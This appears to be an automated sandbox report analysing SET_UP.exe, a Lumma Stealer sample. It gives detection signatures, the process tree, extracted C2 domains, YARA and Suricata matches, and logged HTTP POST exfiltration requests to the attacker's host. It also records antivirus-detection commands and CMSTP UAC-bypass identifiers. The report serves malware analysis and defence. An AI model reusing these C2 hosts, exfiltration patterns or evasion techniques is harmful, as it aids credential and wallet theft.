Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name: SET_UP.exe
Analysis ID: 1580732
MD5: 117c82db1bc3c31c9196bd4a949f3358
SHA1: 5ca11fd4cff68324465dc3ea5a4d2c7e5bd2dd4d
SHA256: f155b4c6f26be1e233572d98655e2b997209142a3c01cdc25c389f14f7ff50b3
Tags: exe, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • SET_UP.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 117C82DB1BC3C31C9196BD4A949F3358)
    • VER7RSX5CP4YEKECQGJ84KT.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" MD5: 2A2989ED741C431F4A3276264F7BDB61)
      • VER7RSX5CP4YEKECQGJ84KT.tmp (PID: 2680 cmdline: "C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" MD5: A62041070E18901131CBBE7825EC4EC7)
        • VER7RSX5CP4YEKECQGJ84KT.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART MD5: 2A2989ED741C431F4A3276264F7BDB61)
          • VER7RSX5CP4YEKECQGJ84KT.tmp (PID: 5800 cmdline: "C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART MD5: A62041070E18901131CBBE7825EC4EC7)
            • timeout.exe (PID: 1352 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7160 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6560 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2504 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7060 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6532 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5608 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6404 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6648 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6672 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6816 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7052 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7076 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7156 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5232 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5596 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5672 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2916 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1868 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • IUService.exe (PID: 1284 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe" MD5: 0588CE0C39DA3283E779C1D5B21D283B)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat", "laborersquei.click", "curverpluch.lat", "bashfulacid.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "hRjzG3--ELVIRA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x4e56d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
34.2.IUService.exe.50000000.7.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
34.2.IUService.exe.931cb29.2.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
34.2.IUService.exe.931cb29.2.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x13396c:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x133bf8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1339f7:$s1: CoGetObject
  • 0x133c83:$s1: CoGetObject
  • 0x133950:$s2: Elevation:Administrator!new:
  • 0x133bdc:$s2: Elevation:Administrator!new:
34.2.IUService.exe.9361bf6.5.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
34.2.IUService.exe.9361bf6.5.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0xee89f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0xeeb2b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0xee92a:$s1: CoGetObject
  • 0xeebb6:$s1: CoGetObject
  • 0xee883:$s2: Elevation:Administrator!new:
  • 0xeeb0f:$s2: Elevation:Administrator!new:
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-25T22:17:12.751979+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:14.752659+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:16.911417+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:19.240090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:21.583075+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:24.187670+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:26.263533+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:28.331819+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:31.032314+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 172.67.214.186 | 443 | TCP
2024-12-25T22:17:13.528341+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:15.500846+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:29.105041+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:13.528341+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:15.500846+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | TCP
2024-12-25T22:17:31.931874+0100 | 2008438 | 1 | A Network Trojan was detected | 172.67.214.186 | 443 | 192.168.2.4 | 49744 | TCP
2024-12-25T22:17:17.904222+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.21.89.250 | 443 | TCP

                      AV Detection

                      Source: https://neqi.shop/sdgjyut/psh.txt#Avira URL Cloud: Label: malware
Source: SET_UP.exe.6556.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat", "laborersquei.click", "curverpluch.lat", "bashfulacid.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "hRjzG3--ELVIRA"}
Source: SET_UP.exe, Virustotal: Detection: 11%
Source: SET_UP.exe, ReversingLabs: Detection: 15%
Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, String decryptor:
  • bashfulacid.lat
  • tentabatte.lat
  • curverpluch.lat
  • talkynicer.lat
  • shapestickyr.lat
  • manyrestro.lat
  • slipperyloo.lat
  • wordyfindy.lat
  • laborersquei.click
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • hRjzG3--ELVIRA

                      Exploits

Source: Yara match, File source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000022.00000002.2326879519.0000000009316000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: SET_UP.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: Binary string: wntdll.pdbUGP source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe, Code function: 34_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,34_2_5001C0CC
Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe, Code function: 34_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,34_2_5000C390
Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe, Code function: 34_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,34_2_5001BB34
Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe, Code function: 34_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,34_2_5001BD10

                      Networking

                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.89.250:443
                      Source: Malware configuration extractorURLs: tentabatte.lat
                      Source: Malware configuration extractorURLs: wordyfindy.lat
                      Source: Malware configuration extractorURLs: talkynicer.lat
                      Source: Malware configuration extractorURLs: manyrestro.lat
                      Source: Malware configuration extractorURLs: laborersquei.click
                      Source: Malware configuration extractorURLs: curverpluch.lat
                      Source: Malware configuration extractorURLs: bashfulacid.lat
                      Source: Malware configuration extractorURLs: slipperyloo.lat
                      Source: Malware configuration extractorURLs: shapestickyr.lat
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.214.186:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.214.186:443 -> 192.168.2.4:49744
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 80 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YOBRJ4S6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18104 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UH1202JSAWTJPCRC47V | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8791 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LB6A8ZHZIG3X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20402 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=S3YCAMS19M3H | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1211 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3ZX9UNNKS | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1053 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 115 | Host: laborersquei.click
                      Source: global traffic, HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: klipsyzogey.shop
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: laborersquei.click
                      Source: global trafficDNS traffic detected: DNS query: neqi.shop
                      Source: global trafficDNS traffic detected: DNS query: klipsyzogey.shop
                      Source: unknown, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: laborersquei.click
                      Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49743 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: Yara match File source: Process Memory Space: IUService.exe PID: 1284, type: MEMORYSTR

                      System Summary

                      Source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_0254FD83 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0254FD83
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF0C34_2_5000EF0C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF1434_2_5000EF14
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF1C34_2_5000EF1C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF2434_2_5000EF24
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF2C34_2_5000EF2C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF3434_2_5000EF34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EF3C34_2_5000EF3C
